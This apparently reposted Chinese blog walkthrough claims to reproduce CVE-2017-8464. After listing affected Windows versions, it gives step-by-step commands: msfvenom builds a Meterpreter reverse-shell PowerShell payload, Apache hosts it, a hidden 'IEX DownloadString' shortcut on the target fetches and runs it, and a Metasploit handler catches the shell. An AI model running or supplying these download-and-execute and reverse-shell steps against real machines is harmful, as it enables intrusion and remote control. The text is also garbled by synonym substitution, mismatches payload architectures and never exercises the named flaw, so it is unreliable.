震网三代（CVE-2017-8464)复现

一.影响版本
毛病影响范围：
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
服务器系统
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
二.毛病使用与复现
攻击机:kali2019.4 ip:192.168.1.192
靶机:windows 7 专业版 ip:192.168.1.182
使用Powershell快捷键进行攻击
生成攻击文件,search.ps1,终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.192 -f psh-reflection>search.ps1

切换到opt目次，然后查察到已生成了search.ps1 的powershell 后门

将生成的search.ps1拷贝到/var/www/html目次下
CD到/var/www/html目次下看到search.ps1存在

启动apache服务

访问web下的http://127.0.0.1/search.ps1，可以直接访问：

在靶机上创建一个powershell远程快捷：
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.192/search.ps1’);test.ps1”

名称为:powershell.exe

kali下创建监听反弹，并且可以看到乐成反弹出靶机的shell:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options

set LHOST 192.168.1.192
set LPORT 5555
exploit开始监听
在靶机上运行新建的powershell快捷方式，即可反弹shell，效果如下图所示

然后ipconfig看到靶机的ip是192.168.1.182

测试到此竣事
请勿将技术使用在非法的用途上。
出了事情本人一概不负责

来源：https://blog.csdn.net/weixin_52777165/article/details/111936169
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！